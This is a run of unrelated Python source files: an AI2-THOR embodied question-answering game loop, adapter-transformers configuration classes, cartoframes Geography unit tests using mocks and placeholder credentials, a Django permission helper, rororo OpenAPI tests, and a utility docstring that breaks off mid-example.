self.event = game_util.reset(self.env, self.scene_name,
render_image=True,
render_depth_image=True,
render_class_image=True,
render_object_image=True)
self.agent_height = self.event.metadata['agent']['position']['y']
self.event = self.env.random_initialize(self.scene_seed, max_num_repeats=max_num_repeats, remove_prob=remove_prob)
print('Question: %s' % self.question_str)
if answer == 'True':
self.answer = True
elif answer == 'False':
self.answer = False
else:
self.answer = int(answer)
start_point = self.local_random.randint(0, self.points.shape[0] - 1)
start_point = self.points[start_point, :].copy()
self.start_point = (start_point[0], start_point[1], self.local_random.randint(0, 3))
action = {'action': 'TeleportFull',
'x': self.start_point[0] * constants.AGENT_STEP_SIZE,
'y': self.agent_height,
'z': self.start_point[1] * constants.AGENT_STEP_SIZE,
'rotateOnTeleport': True,
'rotation': self.start_point[2] * 90,
'horizon': 30,
}
self.event = self.env.step(action)
self.process_frame()
def step(self, action_key):
action = None
if action_key == 'w':
action = {'action': 'MoveAhead'}
elif action_key == 'a':
action = {'action': 'RotateLeft'}
elif action_key == 's':
action = {'action': 'RotateRight'}
elif action_key == 'o':
action = {'action': 'OpenObject'}
elif action_key == 'c':
action = {'action': 'CloseObject'}
elif action_key == '+':
action = {'action': 'LookUp'}
elif action_key == '-':
action = {'action': 'LookDown'}
elif action_key == 'answer':
pass
elif action_key == 'q':
quit()
elif action_key == 'dd':
import pdb
pdb.set_trace()
print('debug entered')
else:
return
self.num_steps += 1
if action is not None:
if action['action'] in {'OpenObject', 'CloseObject'}:
action = game_util.set_open_close_object(action, self.event)
self.event = self.env.step(action)
if not self.event.metadata['lastActionSuccess']:
self.num_failed_steps += 1
self.process_frame()
def process_frame(self):
self.pose = self.event.pose
self.s_t = self.event.frame
self.detection_image = self.s_t.copy()
self.s_t_depth = self.event.depth_frame
boxes = []
scores = []
class_names = []
for k,v in self.event.class_detections2D.items():
if k in constants.OBJECTS_SET:
boxes.extend(v)
scores.extend([1] * len(v))
class_names.extend([k] * len(v))
detected_objects = [game_util.get_object(obj_id, self.event.metadata) for obj_id in self.event.instance_detections2D.keys()]
detected_objects = [obj for obj in detected_objects if obj is not None]
boxes = np.array([self.event.instance_detections2D[obj['objectId']] for obj in detected_objects])
class_names = np.array([obj['objectType'] for obj in detected_objects])
scores = np.ones(len(boxes))
self.detection_image = drawing.visualize_detections(
self.event.frame, boxes, class_names, scores)
print(self.question_str)
if __name__ == '__main__':
state = PersonGameState()
random.seed(0)
for question_type in constants.USED_QUESTION_TYPES:
print('Starting question type', question_type)
num_correct = 0
num_total = 0
questions = []
for test_ep in range(10):
questions.append((test_ep, (random.randint(0, 2**31), question_type)))
random.shuffle(questions)
for (qq, question) in enumerate(questions):
num_total += 1
action_key = ''
state.reset(*question)
while action_key != 'answer':
if constants.DEBUG:
images = [
state.s_t,
state.detection_image,
state.s_t_depth,
state.event.class_segmentation_frame,
state.event.instance_segmentation_frame]
titles = ['state', 'detections', 'depth', 'class segmentation', 'instance segmentation']
image = drawing.subplot(images, 2, 3, constants.SCREEN_WIDTH, constants.SCREEN_HEIGHT, 5, titles)
cv2.imshow('image', image[:, :, ::-1])
cv2.waitKey(10)
print('w: MoveAhead\na: RotateLeft\ns: RotateRight\no: OpenObject\nc: CloseObject\n+: LookUp\n-: LookDown\nanswer: Open answer dialog. type {true, false, yes, no}\nq: quit\ndd: enter debug')
new_action_key = input(">> ")
if new_action_key != '':
action_key = new_action_key
state.step(action_key)
answer = None
while answer is None:
answer = input("answer: ").lower()
if answer in {'true', 'false', 'yes', 'no'}:
if ((answer in {'true', 'yes'} and state.answer) or
(answer in {'false', 'no'} and not state.answer)):
print('Correct')
num_correct += 1
else:
try:
answer = int(answer)
if answer == state.answer:
print('Correct')
num_correct += 1
except ValueError as ve:
answer = None
print('Num questions', num_total)
print('Correct percent: %.2f%%' % (num_correct * 100.0 / num_total))
print('Total moves:', state.num_steps)
print('Average moves:', (state.num_steps / (qq + 1)))
print('Invalid moves percent: %.2f%%' % (state.num_failed_steps * 100.0 / state.num_steps))
state.num_steps = 0
state.num_failed_steps = 0
|
470052
|
import copy
import json
import logging
from collections.abc import Mapping
from dataclasses import FrozenInstanceError, asdict, dataclass, field, is_dataclass, replace
from os.path import isfile
from typing import List, Optional, Union
from .adapter_utils import AdapterType, get_adapter_config_hash, resolve_adapter_config
logger = logging.getLogger(__name__)
@dataclass()
class InvertibleAdapterConfig(Mapping):
block_type: str
non_linearity: str
reduction_factor: int
# We want to emulate a simple form of immutability while keeping the ability to add custom attributes.
# Therefore, we don't allow changing attribute values if set once.
def __setattr__(self, name, value):
if name in self.__dict__:
raise FrozenInstanceError()
else:
object.__setattr__(self, name, value)
def __delattr__(self, name):
raise FrozenInstanceError()
def __getitem__(self, key):
return self.__dict__[key]
def __iter__(self):
return iter(self.__dict__)
def __len__(self):
return len(self.__dict__)
@dataclass
class AdapterConfig(Mapping):
"""Base class that models the architecture of an adapter."""
original_ln_before: bool
original_ln_after: bool
residual_before_ln: bool
adapter_residual_before_ln: bool
ln_before: bool
ln_after: bool
mh_adapter: bool
output_adapter: bool
non_linearity: str
reduction_factor: int
invertible_adapter: Optional[InvertibleAdapterConfig] = None
leave_out: List[int] = field(default_factory=list)
# We want to emulate a simple form of immutability while keeping the ability to add custom attributes.
# Therefore, we don't allow changing attribute values if set once.
def __setattr__(self, name, value):
if name in self.__dict__:
raise FrozenInstanceError()
else:
object.__setattr__(self, name, value)
def __delattr__(self, name):
raise FrozenInstanceError()
def __getitem__(self, key):
return self.__dict__[key]
def __iter__(self):
return iter(self.__dict__)
def __len__(self):
return len(self.__dict__)
def to_dict(self):
return asdict(self)
def replace(self, **changes):
return replace(self, **changes)
@classmethod
def from_dict(cls, config):
return cls(**config)
@classmethod
def load(cls, config: Union[dict, str], download_kwargs=None, **kwargs):
"""Loads a given adapter configuration specifier into a full AdapterConfig instance.
Args:
config (Union[dict, str]): The configuration to load. Can be either:
- a dictionary representing the full config
- an identifier string available in ADAPTER_CONFIG_MAP
- the path to a file containing a full adapter configuration
- an identifier string available in Adapter-Hub
Returns:
AdapterConfig: The resolved adapter configuration.
"""
if not config:
return None
# if force_download is set, skip the local map
if download_kwargs and download_kwargs.get("force_download", False):
local_map = None
else:
local_map = ADAPTER_CONFIG_MAP
if download_kwargs:
config_dict = resolve_adapter_config(config, local_map=local_map, **download_kwargs)
else:
config_dict = resolve_adapter_config(config, local_map=local_map)
# convert back to dict to allow attr overrides
if isinstance(config_dict, AdapterConfig):
config_dict = config_dict.to_dict()
config_dict.update((k, v) for k, v in kwargs.items() if v is not None)
return AdapterConfig.from_dict(config_dict)
@dataclass
class PfeifferConfig(AdapterConfig):
"""
The adapter architecture proposed by Pfeiffer et al., 2020.
Described in https://arxiv.org/pdf/2005.00247.pdf.
"""
original_ln_before: bool = True
original_ln_after: bool = True
residual_before_ln: bool = True
adapter_residual_before_ln: bool = False
ln_before: bool = False
ln_after: bool = False
mh_adapter: bool = False
output_adapter: bool = True
non_linearity: str = "relu"
reduction_factor: int = 16
invertible_adapter: Optional[dict] = InvertibleAdapterConfig(
block_type="nice", non_linearity="relu", reduction_factor=2
)
@dataclass
class HoulsbyConfig(AdapterConfig):
"""
The adapter architecture proposed by Houlsby et al., 2019.
Described in https://arxiv.org/pdf/1902.00751.pdf.
"""
original_ln_before: bool = False
original_ln_after: bool = True
residual_before_ln: bool = True
adapter_residual_before_ln: bool = False
ln_before: bool = False
ln_after: bool = False
mh_adapter: bool = True
output_adapter: bool = True
non_linearity: str = "swish"
reduction_factor: int = 16
ADAPTER_CONFIG_MAP = {"pfeiffer": PfeifferConfig(), "houlsby": HoulsbyConfig()}
DEFAULT_ADAPTER_CONFIG = "pfeiffer"
class ModelAdaptersConfig:
"""This class manages the setup and configuration of adapter modules in a pre-trained model.
"""
def __init__(self, **kwargs):
# adapters maps <name> -> (<type>, <config_name>)
self.adapters = kwargs.pop("adapters", {})
self.config_map = kwargs.pop("config_map", {})
def adapter_list(self, adapter_type: AdapterType) -> list:
return [k for k, v in self.adapters.items() if v[0] == adapter_type]
def get_type(self, adapter_name: str) -> Optional[AdapterType]:
if adapter_name in self.adapters:
return self.adapters[adapter_name][0]
else:
return None
def get(self, adapter_name: str, return_type: bool = False):
if adapter_name in self.adapters:
adapter_type, config_name = self.adapters[adapter_name]
if config_name in self.config_map:
config = self.config_map.get(config_name, None)
else:
config = ADAPTER_CONFIG_MAP.get(config_name, None)
if not config and adapter_type in self.config_map:
config = self.config_map[adapter_type]
elif (
not config
): # If no config is specified via config_name or adapter_type, we just use the global default
config = DEFAULT_ADAPTER_CONFIG
if isinstance(config, str):
config = ADAPTER_CONFIG_MAP[config]
else:
config, adapter_type = None, None
if return_type:
return config, adapter_type
else:
return config
def add(self, adapter_name: str, adapter_type: AdapterType, config: Optional[Union[str, dict]] = None):
if adapter_name in self.adapters:
raise ValueError(f"An adapter with the name '{adapter_name}' has already been added.")
if config is None and adapter_type not in self.config_map:
# if config is not specified & no per-type default is set, manually set global default
config = DEFAULT_ADAPTER_CONFIG
config_name = config
if isinstance(config, str):
if config not in ADAPTER_CONFIG_MAP and config not in self.config_map:
raise ValueError(f"Invalid adapter config identifier '{config}''")
# if it's a dict, compute its hash and add a new entry to the config map
elif isinstance(config, Mapping):
config_name = get_adapter_config_hash(config)
self.config_map[config_name] = config
self.adapters[adapter_name] = (adapter_type, config_name)
logger.info(f"Adding adapter '{adapter_name}' of type '{adapter_type}'.")
def get_config(self, adapter_type: AdapterType) -> dict:
config = self.config_map.get(adapter_type, None)
if isinstance(config, str) and config in ADAPTER_CONFIG_MAP:
return ADAPTER_CONFIG_MAP[config]
return config
def set_config(self, adapter_type: AdapterType, config: Union[dict, str, AdapterConfig]):
"""Sets the default adapter configuration of the specified adapter type.
Args:
config (str or dict or AdapterConfig): adapter configuration, can be either:
- a string identifying a pre-defined adapter configuration
- a dictionary representing the adapter configuration
- the path to a file containing the adapter configuration
"""
assert len(self.adapter_list(adapter_type)) < 1, "Can only set new config if no adapters have been added."
if isinstance(config, Mapping) or config in ADAPTER_CONFIG_MAP:
self.config_map[adapter_type] = config
elif isfile(config):
with open(config, "r", encoding="utf-8") as f:
self.config_map[adapter_type] = json.load(f)
else:
raise ValueError("Unable to identify {} as a valid adapter config.".format(config))
def common_config_value(self, adapter_names: list, attribute: str):
"""Checks whether all adapters in a list share the same config setting for a given attribute and returns the shared value.
Args:
adapter_names (list): The adapters to check.
attribute (str): The config attribute to check.
"""
common_value = None
for i, name in enumerate(adapter_names):
config = self.get(name)
if not config:
raise ValueError(
f"No adapter with name '{name}' found. Make sure that an adapter with this name is loaded."
)
config_value = config.get(attribute, None)
if i > 0 and config_value != common_value:
raise ValueError(f"All given adapters must define the same value for config attribute {attribute}.")
common_value = config_value
return common_value
def to_dict(self):
output_dict = {}
output_dict["adapters"] = copy.deepcopy(self.adapters)
output_dict["config_map"] = copy.deepcopy(self.config_map)
return output_dict
def build_full_config(adapter_config, model_config, **kwargs):
config_dict = {"model_type": model_config.model_type, "hidden_size": model_config.hidden_size}
config_dict.update(kwargs)
if is_dataclass(adapter_config):
config_dict["config"] = adapter_config.to_dict()
else:
config_dict["config"] = adapter_config
return config_dict
@dataclass
class AdapterFusionConfig(Mapping):
"""Base class that models the architecture of an adapter."""
key: bool
query: bool
value: bool
query_before_ln: bool
regularization: bool
residual_before: bool
temperature: bool
value_before_softmax: bool
value_initialized: str
# We want to emulate a simple form of immutability while keeping the ability to add custom attributes.
# Therefore, we don't allow changing attribute values if set once.
def __setattr__(self, name, value):
if name in self.__dict__:
raise FrozenInstanceError()
else:
object.__setattr__(self, name, value)
def __delattr__(self, name):
raise FrozenInstanceError()
def __getitem__(self, key):
return self.__dict__[key]
def __iter__(self):
return iter(self.__dict__)
def __len__(self):
return len(self.__dict__)
def to_dict(self):
return asdict(self)
def replace(self, **changes):
return replace(self, **changes)
@classmethod
def from_dict(cls, config):
return cls(**config)
@classmethod
def load(cls, config: Union[dict, str], **kwargs):
"""Loads a given adapter configuration specifier into a full AdapterConfig instance.
Args:
config (Union[dict, str]): The configuration to load. Can be either:
- a dictionary representing the full config
- an identifier string available in ADAPTERFUSION_CONFIG_MAP
- the path to a file containing a full adapter configuration
- an identifier string available in Adapter-Hub
Returns:
AdapterFusionConfig: The resolved AdapterFusion configuration.
"""
# currently storing AdapterFusion weights on AdapterHub is not supported.
config_dict = resolve_adapter_config(config, local_map=ADAPTERFUSION_CONFIG_MAP, try_loading_from_hub=False)
# convert back to dict to allow attr overrides
if isinstance(config_dict, AdapterFusionConfig):
config_dict = config_dict.to_dict()
config_dict.update(kwargs)
return AdapterFusionConfig.from_dict(config_dict)
@dataclass
class StaticAdapterFusionConfig(AdapterFusionConfig):
"""
Static AdapterFusion configuration: key/query attention without a trainable value projection.
See AdapterFusion (Pfeiffer et al., 2020): https://arxiv.org/pdf/2005.00247.pdf.
"""
key: bool = True
query: bool = True
value: bool = False
query_before_ln: bool = False
regularization: bool = False
residual_before: bool = False
temperature: bool = False
value_before_softmax: bool = True
value_initialized: str = False
@dataclass
class DynamicAdapterFusionConfig(AdapterFusionConfig):
"""
Dynamic AdapterFusion configuration: trainable key, query and value projections with regularization.
See AdapterFusion (Pfeiffer et al., 2020): https://arxiv.org/pdf/2005.00247.pdf.
"""
key: bool = True
query: bool = True
value: bool = True
query_before_ln: bool = False
regularization: bool = True
residual_before: bool = False
temperature: bool = False
value_before_softmax: bool = True
value_initialized: str = True
ADAPTERFUSION_CONFIG_MAP = {"static": StaticAdapterFusionConfig(), "dynamic": DynamicAdapterFusionConfig()}
DEFAULT_ADAPTERFUSION_CONFIG = "dynamic"
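# --- Usage sketch (illustrative; the adapter/task names are hypothetical and
# --- AdapterType.text_task is assumed to exist in adapter_utils) ---
# AdapterConfig.load resolves a predefined identifier from ADAPTER_CONFIG_MAP and
# lets keyword arguments override individual attributes; ModelAdaptersConfig then
# tracks which adapter uses which configuration:
#
#   config = AdapterConfig.load("pfeiffer", reduction_factor=8)
#   adapters_config = ModelAdaptersConfig()
#   adapters_config.add("sst-2", AdapterType.text_task, config=config.to_dict())
#   adapters_config.get("sst-2")   # -> the stored configuration for this adapter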
|
470066
|
import os
import pytest
import pandas as pd
from unittest.mock import patch
from pyrestcli.exceptions import ServerErrorException
from cartoframes.auth import Credentials
from cartoframes.data.observatory.catalog.entity import CatalogList
from cartoframes.data.observatory.catalog.geography import Geography
from cartoframes.data.observatory.catalog.repository.geography_repo import GeographyRepository
from cartoframes.data.observatory.catalog.repository.dataset_repo import DatasetRepository
from cartoframes.data.observatory.catalog.subscription_info import SubscriptionInfo
from cartoframes.data.observatory.catalog.repository.constants import GEOGRAPHY_FILTER
from .examples import (
test_geography1, test_geographies, test_datasets, db_geography1,
test_geography2, db_geography2, test_subscription_info
)
from carto.do_dataset import DODataset
class TestGeography(object):
@patch.object(GeographyRepository, 'get_by_id')
def test_get_geography_by_id(self, mocked_repo):
# Given
mocked_repo.return_value = test_geography1
# When
geography = Geography.get(test_geography1.id)
# Then
assert isinstance(geography, object)
assert isinstance(geography, Geography)
assert geography == test_geography1
@patch.object(DatasetRepository, 'get_all')
def test_get_datasets_by_geography(self, mocked_repo):
# Given
mocked_repo.return_value = test_datasets
# When
datasets = test_geography1.datasets
# Then
mocked_repo.assert_called_once_with({GEOGRAPHY_FILTER: test_geography1.id})
assert isinstance(datasets, list)
assert isinstance(datasets, CatalogList)
assert datasets == test_datasets
def test_geography_properties(self):
# Given
geography = Geography(db_geography1)
# When
geography_id = geography.id
slug = geography.slug
name = geography.name
description = geography.description
country = geography.country
language = geography.language
provider = geography.provider
geom_coverage = geography.geom_coverage
update_frequency = geography.update_frequency
version = geography.version
is_public_data = geography.is_public_data
summary = geography.summary
# Then
assert geography_id == db_geography1['id']
assert slug == db_geography1['slug']
assert name == db_geography1['name']
assert description == db_geography1['description']
assert country == db_geography1['country_id']
assert language == db_geography1['lang']
assert provider == db_geography1['provider_id']
assert geom_coverage == db_geography1['geom_coverage']
assert update_frequency == db_geography1['update_frequency']
assert version == db_geography1['version']
assert is_public_data == db_geography1['is_public_data']
assert summary == db_geography1['summary_json']
def test_geography_is_exported_as_series(self):
# Given
geography = test_geography1
# When
geography_series = geography.to_series()
# Then
assert isinstance(geography_series, pd.Series)
assert geography_series['id'] == geography.id
def test_geography_is_exported_as_dict(self):
# Given
geography = Geography(db_geography1)
excluded_fields = ['summary_json', 'geom_coverage']
expected_dict = {key: value for key, value in db_geography1.items() if key not in excluded_fields}
# When
geography_dict = geography.to_dict()
# Then
assert isinstance(geography_dict, dict)
assert geography_dict == expected_dict
def test_geography_is_represented_with_classname_and_slug(self):
# Given
geography = Geography(db_geography1)
# When
geography_repr = repr(geography)
# Then
assert geography_repr == "<Geography.get('{id}')>".format(id=db_geography1['slug'])
def test_geography_is_printed_with_classname(self):
# Given
geography = Geography(db_geography1)
# When
geography_str = str(geography)
# Then
assert geography_str == "<Geography.get('{id}')>".format(id=db_geography1['slug'])
@patch.object(GeographyRepository, 'get_all')
def test_get_all_geographies(self, mocked_repo):
# Given
mocked_repo.return_value = test_geographies
# When
geographies = Geography.get_all()
# Then
assert isinstance(geographies, list)
assert isinstance(geographies, CatalogList)
assert geographies == test_geographies
@patch.object(GeographyRepository, 'get_all')
def test_get_all_geographies_credentials(self, mocked_repo):
# Given
mocked_repo.return_value = test_geographies
credentials = Credentials('fake_user', '1234')
# When
geographies = Geography.get_all(credentials=credentials)
# Then
mocked_repo.assert_called_once_with(None, credentials)
assert isinstance(geographies, list)
assert isinstance(geographies, CatalogList)
assert geographies == test_geographies
@patch.object(GeographyRepository, 'get_all')
def test_get_all_geographies_credentials_without_do_enabled(self, mocked_repo):
# Given
def raise_exception(a, b):
raise ServerErrorException(['The user does not have Data Observatory enabled'])
mocked_repo.side_effect = raise_exception
credentials = Credentials('fake_user', '<PASSWORD>')
# When
with pytest.raises(Exception) as e:
Geography.get_all(credentials=credentials)
# Then
assert str(e.value) == (
'We are sorry, the Data Observatory is not enabled for your account yet. '
'Please contact your customer success manager or send an email to '
'<EMAIL> to request access to it.')
def test_geography_list_is_printed_with_classname_and_slugs(self):
# Given
geographies = CatalogList([test_geography1, test_geography2])
# When
categories_str = str(geographies)
# Then
assert categories_str == "[<Geography.get('{id1}')>, <Geography.get('{id2}')>]" \
.format(id1=db_geography1['slug'], id2=db_geography2['slug'])
def test_geography_list_is_represented_with_classname_and_slugs(self):
# Given
geographies = CatalogList([test_geography1, test_geography2])
# When
categories_repr = repr(geographies)
# Then
assert categories_repr == "[<Geography.get('{id1}')>, <Geography.get('{id2}')>]"\
.format(id1=db_geography1['slug'], id2=db_geography2['slug'])
def test_geographies_items_are_obtained_as_geography(self):
# Given
geographies = test_geographies
# When
geography = geographies[0]
# Then
assert isinstance(geography, Geography)
assert geography == test_geography1
def test_geographies_are_exported_as_dataframe(self):
# Given
geographies = test_geographies
geography = geographies[0]
expected_geography_df = geography.to_series()
del expected_geography_df['summary_json']
# When
geography_df = geographies.to_dataframe()
sliced_geography = geography_df.iloc[0]
# Then
assert isinstance(geography_df, pd.DataFrame)
assert isinstance(sliced_geography, pd.Series)
assert sliced_geography.equals(expected_geography_df)
@patch('cartoframes.data.observatory.catalog.subscriptions.get_subscription_ids')
@patch.object(GeographyRepository, 'get_by_id')
@patch.object(DODataset, 'download_stream')
def test_geography_download(self, mock_download_stream, mock_get_by_id, mock_subscription_ids):
# Given
mock_get_by_id.return_value = test_geography1
geography = Geography.get(test_geography1.id)
mock_download_stream.return_value = []
mock_subscription_ids.return_value = [test_geography1.id]
credentials = Credentials('fake_user', '<PASSWORD>')
# Then
geography.to_csv('fake_path', credentials)
os.remove('fake_path')
@patch('cartoframes.data.observatory.catalog.subscriptions.get_subscription_ids')
@patch.object(GeographyRepository, 'get_by_id')
def test_geography_download_not_subscribed(self, mock_get_by_id, mock_subscription_ids):
# Given
mock_get_by_id.return_value = test_geography2 # is private
geography = Geography.get(test_geography2.id)
mock_subscription_ids.return_value = []
credentials = Credentials('fake_user', '<PASSWORD>')
with pytest.raises(Exception) as e:
geography.to_csv('fake_path', credentials)
# Then
assert str(e.value) == (
'You are not subscribed to this Geography yet. '
'Please, use the subscribe method first.')
@patch.object(GeographyRepository, 'get_by_id')
@patch.object(DODataset, 'download_stream')
def test_geography_download_not_subscribed_but_public(self, mock_download_stream, mock_get_by_id):
# Given
mock_get_by_id.return_value = test_geography1 # is public
geography = Geography.get(test_geography1.id)
mock_download_stream.return_value = []
credentials = Credentials('fake_user', '<PASSWORD>')
geography.to_csv('fake_path', credentials)
os.remove('fake_path')
@patch.object(GeographyRepository, 'get_by_id')
@patch.object(DODataset, 'download_stream')
def test_geography_download_without_do_enabled(self, mock_download_stream, mock_get_by_id):
# Given
mock_get_by_id.return_value = test_geography1
geography = Geography.get(test_geography1.id)
def raise_exception(limit=None, order_by=None, sql_query=None, add_geom=None, is_geography=None):
raise ServerErrorException(['The user does not have Data Observatory enabled'])
mock_download_stream.side_effect = raise_exception
credentials = Credentials('fake_user', '<PASSWORD>')
# When
with pytest.raises(Exception) as e:
geography.to_csv('fake_path', credentials)
# Then
assert str(e.value) == (
'We are sorry, the Data Observatory is not enabled for your account yet. '
'Please contact your customer success manager or send an email to '
'<EMAIL> to request access to it.')
@patch('cartoframes.data.observatory.catalog.subscriptions.get_subscription_ids')
@patch('cartoframes.data.observatory.catalog.utils.display_subscription_form')
@patch('cartoframes.data.observatory.catalog.utils.display_existing_subscription_message')
def test_geography_subscribe(self, mock_display_message, mock_display_form, mock_subscription_ids):
# Given
expected_id = db_geography1['id']
expected_subscribed_ids = []
mock_subscription_ids.return_value = expected_subscribed_ids
credentials = Credentials('fake_user', '<PASSWORD>')
geography = Geography(db_geography1)
# When
geography.subscribe(credentials)
# Then
mock_subscription_ids.assert_called_once_with(credentials, 'geography')
mock_display_form.assert_called_once_with(expected_id, 'geography', credentials)
assert not mock_display_message.called
@patch('cartoframes.data.observatory.catalog.subscriptions.get_subscription_ids')
@patch('cartoframes.data.observatory.catalog.utils.display_subscription_form')
@patch('cartoframes.data.observatory.catalog.utils.display_existing_subscription_message')
def test_geography_subscribe_existing(self, mock_display_message, mock_display_form, mock_subscription_ids):
# Given
expected_id = db_geography1['id']
expected_subscribed_ids = [expected_id]
mock_subscription_ids.return_value = expected_subscribed_ids
credentials = Credentials('fake_user', '<PASSWORD>')
geography = Geography(db_geography1)
# When
geography.subscribe(credentials)
# Then
mock_subscription_ids.assert_called_once_with(credentials, 'geography')
mock_display_message.assert_called_once_with(expected_id, 'geography')
assert not mock_display_form.called
@patch('cartoframes.data.observatory.catalog.subscriptions.get_subscription_ids')
@patch('cartoframes.data.observatory.catalog.utils.display_subscription_form')
@patch('cartoframes.auth.defaults.get_default_credentials')
def test_geography_subscribe_default_credentials(
self, mocked_credentials, mock_display_form, mock_subscription_ids):
# Given
expected_credentials = Credentials('fake_user', '<PASSWORD>')
mocked_credentials.return_value = expected_credentials
geography = Geography(db_geography1)
# When
geography.subscribe()
# Then
mock_subscription_ids.assert_called_once_with(expected_credentials, 'geography')
mock_display_form.assert_called_once_with(db_geography1['id'], 'geography', expected_credentials)
def test_geography_subscribe_wrong_credentials(self):
# Given
wrong_credentials = 1234
geography = Geography(db_geography1)
# When
with pytest.raises(ValueError) as e:
geography.subscribe(wrong_credentials)
# Then
assert str(e.value) == ('Credentials attribute is required. '
'Please pass a `Credentials` instance '
'or use the `set_default_credentials` function.')
@patch('cartoframes.data.observatory.catalog.subscriptions.get_subscription_ids')
@patch('cartoframes.data.observatory.catalog.utils.display_subscription_form')
def test_geography_subscribe_without_do_enabled(self, mock_display_form, mock_subscription_ids):
# Given
def raise_exception(a, b, c):
raise ServerErrorException(['The user does not have Data Observatory enabled'])
mock_display_form.side_effect = raise_exception
geography = Geography(db_geography1)
credentials = Credentials('fake_user', '<PASSWORD>')
# When
with pytest.raises(Exception) as e:
geography.subscribe(credentials)
# Then
assert str(e.value) == (
'We are sorry, the Data Observatory is not enabled for your account yet. '
'Please contact your customer success manager or send an email to '
'<EMAIL> to request access to it.')
@patch('cartoframes.data.observatory.catalog.subscription_info.fetch_subscription_info')
def test_geography_subscription_info(self, mock_fetch):
# Given
mock_fetch.return_value = test_subscription_info
credentials = Credentials('fake_user', '<PASSWORD>')
geography = Geography(db_geography1)
# When
info = geography.subscription_info(credentials)
# Then
mock_fetch.assert_called_once_with(db_geography1['id'], 'geography', credentials)
assert isinstance(info, SubscriptionInfo)
assert info.id == test_subscription_info['id']
assert info.estimated_delivery_days == test_subscription_info['estimated_delivery_days']
assert info.subscription_list_price == test_subscription_info['subscription_list_price']
assert info.tos == test_subscription_info['tos']
assert info.tos_link == test_subscription_info['tos_link']
assert info.licenses == test_subscription_info['licenses']
assert info.licenses_link == test_subscription_info['licenses_link']
assert info.rights == test_subscription_info['rights']
assert str(info) == 'Properties: id, estimated_delivery_days, ' + \
'subscription_list_price, tos, tos_link, ' + \
'licenses, licenses_link, rights'
@patch('cartoframes.data.observatory.catalog.subscription_info.fetch_subscription_info')
@patch('cartoframes.auth.defaults.get_default_credentials')
def test_geography_subscription_info_default_credentials(self, mocked_credentials, mock_fetch):
# Given
expected_credentials = Credentials('fake_user', '<PASSWORD>')
mocked_credentials.return_value = expected_credentials
geography = Geography(db_geography1)
# When
geography.subscription_info()
# Then
mock_fetch.assert_called_once_with(db_geography1['id'], 'geography', expected_credentials)
def test_geography_subscription_info_wrong_credentials(self):
# Given
wrong_credentials = 1234
geography = Geography(db_geography1)
# When
with pytest.raises(ValueError) as e:
geography.subscription_info(wrong_credentials)
# Then
assert str(e.value) == ('Credentials attribute is required. '
'Please pass a `Credentials` instance '
'or use the `set_default_credentials` function.')
@patch('cartoframes.data.observatory.catalog.subscription_info.fetch_subscription_info')
def test_geography_subscription_info_without_do_enabled(self, mock_fetch):
# Given
def raise_exception(a, b, c):
raise ServerErrorException(['The user does not have Data Observatory enabled'])
mock_fetch.side_effect = raise_exception
geography = Geography(db_geography1)
credentials = Credentials('fake_user', '<PASSWORD>')
# When
with pytest.raises(Exception) as e:
geography.subscription_info(credentials)
# Then
assert str(e.value) == (
'We are sorry, the Data Observatory is not enabled for your account yet. '
'Please contact your customer success manager or send an email to '
'<EMAIL> to request access to it.')
470077
from braces.views import LoginRequiredMixin
from django.core.exceptions import PermissionDenied
from django.views.generic import View
from guardian.shortcuts import get_perms
def has_perms(user, perms, obj=None, required_all=True):
if obj:
perms_obj = get_perms(user, obj)
tests = [perm in perms_obj for perm in perms]
else:
tests = [user.has_perm(perm) for perm in perms]
if required_all and all(tests):
return True
if not required_all and any(tests):
return True
raise PermissionDenied
class PermissionMixin(LoginRequiredMixin, View):
def get_queryset(self, *args, **kwargs):
qs = super().get_queryset(*args, **kwargs)
return qs.for_user(self.request.user)
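# Hedged usage sketch for has_perms (hypothetical permission codenames and object;
# not part of the original module): each call returns True or raises PermissionDenied.
#   has_perms(request.user, ['reports.view_report'])                      # global perms
#   has_perms(request.user, ['view_report', 'change_report'], obj=report) # object perms via guardian
#   has_perms(request.user, ['view_report', 'change_report'], obj=report, required_all=False)  # any-of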
470084
from pathlib import Path
import pytest
from aiohttp import web
from pyrsistent import pmap
from rororo import OperationTableDef, setup_openapi
from rororo.openapi.constants import HANDLER_OPENAPI_MAPPING_KEY
from rororo.openapi.exceptions import ConfigurationError
ROOT_PATH = Path(__file__).parent
OPENAPI_JSON_PATH = ROOT_PATH / "openapi.json"
OPENAPI_YAML_PATH = ROOT_PATH / "openapi.yaml"
def test_add_operations():
operations = OperationTableDef()
other = OperationTableDef()
all_operations = OperationTableDef()
@operations.register
@all_operations.register
async def create(request: web.Request) -> web.Response:
return web.json_response(True, status=201)
@other.register
@all_operations.register
async def update(request: web.Request) -> web.Response:
return web.json_response(True)
assert operations + other == all_operations
assert operations != all_operations
assert other != all_operations
operations += other
assert operations == all_operations
assert other != all_operations
@pytest.mark.parametrize("schema_path", (OPENAPI_JSON_PATH, OPENAPI_YAML_PATH))
def test_cache_create_schema_and_spec(schema_path):
operations = OperationTableDef()
for _ in range(10):
setup_openapi(
web.Application(),
schema_path,
operations,
server_url="/api/",
cache_create_schema_and_spec=True,
)
def test_handle_all_create_schema_and_spec_errors(tmp_path):
invalid_json = tmp_path / "invalid_openapi.json"
invalid_json.write_text('{"openapi": "3.')
with pytest.raises(ConfigurationError):
setup_openapi(web.Application(), invalid_json, OperationTableDef())
def test_ignore_non_http_view_methods():
operations = OperationTableDef()
@operations.register
class UserView(web.View):
async def get(self) -> web.Response:
return web.json_response(True)
@operations.register("update_user")
async def patch(self) -> web.Response:
return web.json_response(True)
async def get_user_or_404(self):
raise NotImplementedError
def log_user(self, user):
raise NotImplementedError
assert getattr(UserView, HANDLER_OPENAPI_MAPPING_KEY) == pmap(
{"GET": UserView.get.__qualname__, "PATCH": "update_user"}
)
def test_missed_schema_path_or_schema_and_spec():
with pytest.raises(ConfigurationError):
setup_openapi(web.Application(), OperationTableDef())
470094
import inspect
def AssignMemberVariablesFromParameters(exclude=None, onlyInclude=None):
"""Assign member variables in the caller's object from the caller's parameters.
The caller should be a method associated with an object. Keyword arguments
are supported, but variable arguments are not since they don't have names.
exclude is an optional iterable that specifies names to be explicitly
excluded. If the optional iterable onlyInclude is specified,
parameters / member variables not in onlyInclude will be ignored.
>>> class c:
... def __init__(self, a, b, c=3, **kwargs):
... AssignMemberVariablesFromParameters()
...
... def ignore_a_b(self, a, b, c, d):
... AssignMemberVariablesFromParameters(exclude=['a', 'b'])
...
... def ignore_c_d(alternateNameForSelf, a, b, c, d):
... AssignMemberVariablesFromParameters(onlyInclude=['a', 'b'])
>>> x = c(1, 2, d=4)
>>> (x.a, x.b, x.c, x.d)
(1, 2, 3, 4)
